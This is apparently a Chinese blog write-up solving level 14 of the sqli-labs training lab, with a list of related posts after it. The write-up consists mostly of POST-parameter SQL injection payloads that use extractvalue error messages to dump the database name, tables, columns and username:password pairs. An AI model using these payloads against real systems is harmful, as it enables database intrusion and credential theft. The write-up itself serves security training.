sqli-labs第十四关——“POST报错注入

一:判断注入类型

和上一关一样,输入如下代码,回显报错,其余类型无回显

复制代码
uname=1"&passwd=123

判断为双引号字符型,尝试闭合

判断正确,成功登录

二:开始攻击

1.爆数据库名

复制代码
uname=1" and extractvalue(1,concat(0x7e,(select database())))#&passwd=123

2. 爆表名

复制代码
uname=1" and extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database())))#&passwd=123

3.爆列名

复制代码
uname=1') and extractvalue(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema=database() and table_name='users')))#&passwd=123

4.爆数据

判断数据量

复制代码
uname=1" and extractvalue(1,concat(0x7e,(select count(*) from users)))#&passwd=123

分两段爆数据

复制代码
uname=1" and extractvalue(1,concat(0x7e, substring((select group_concat(username,0x3a,password) from users),1,32)))#&passwd=123
uname=1" and extractvalue(1,concat(0x7e, substring((select group_concat(username,0x3a,password) from users),32,32)))#&passwd=123

❀❀❀ 完结撒花!! ❀❀❀

相关推荐
IT摆渡者3 小时前
MySQL性能巡检脚本分析报告
数据库·mysql
Lyyaoo.4 小时前
Redis基础
数据库·redis·缓存
杨云龙UP5 小时前
ODA登录ODA Web管理界面时提示Password Expired的处理方法_20260423
linux·运维·服务器·数据库·oracle
解救女汉子5 小时前
SQL触发器如何获取触发源应用名_利用APP_NAME函数追踪
jvm·数据库·python
陈皮糖..6 小时前
27 届运维实习笔记|第三、四周:从流程熟练到故障排查,企业运维实战深化
运维·笔记·sql·nginx·ci/cd·云计算·jenkins
weixin_520649876 小时前
数据库函数
数据库
Bert.Cai7 小时前
MySQL LPAD()函数详解
数据库·mysql
OnlyEasyCode8 小时前
Navicat 任务自动备份指定数据库
数据库
if else8 小时前
Redis 哨兵集群部署方案
数据库·redis
yejqvow128 小时前
Pandas 高效实现组内跨行时间戳匹配与布尔标记
jvm·数据库·python